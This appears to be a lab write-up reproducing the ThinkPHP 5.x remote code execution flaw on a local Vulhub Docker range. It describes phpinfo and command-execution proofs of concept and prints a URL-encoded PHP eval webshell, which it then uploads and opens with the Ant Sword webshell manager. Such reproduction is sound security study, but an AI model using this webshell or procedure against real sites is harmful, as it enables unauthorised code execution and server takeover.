Vulnerability introduction
ThinkPHP is an extremely widely used PHP development framework in China. Because the framework handles the controller name incorrectly, if the website does not have forced routing enabled (which is the default), it can execute any method, leading to an RCE vulnerability.
Affected version: Thinkphp5 5.0.22/5.1.29
Vulnerability recurrence
1.Environment setup
Here is an Ubuntu virtual machine used to generate a shooting range based on the vulhub vulnerability integration environment.
Enter the vulnerability path corresponding to Vulhub: cd /vulhub/thinkphp/5-rce
Execute the command docker-compose up -d to compile and run the range container:
Access http://your-ip:8080 through a Win 10 physical machine in the LAN , and you can see the default page of ThinkPHP:
At this point, the vulnerability environment is completed (docker is so efficient)
2. Exploiting vulnerabilities
Poc1
Directly splice it behind your-id:8080, and the phpinfo page will appear when accessing:
Poc2
Directly splice it after your-id:8080, and you will see the page echoing the information for executing the id command:
The point for file upload is found here, and then the webshell file is uploaded.
First, we first URL-encode the one-sentence Trojan:
Encoding result: %3C%3Fphp%20%40eval(%24_POST%7B2333%7D)%20%3B%3F%3E
We splice this code at the id position mentioned above, upload the file, and see an echo on the web page:
It proves that the webshell file upload is successful.
3.webshell connection
Use China Ant Sword to connect:
Enter the URL address where the webshell is uploaded, and the password contained in the one-sentence Trojan.
The connection is successful, and you can see the directory of the website:
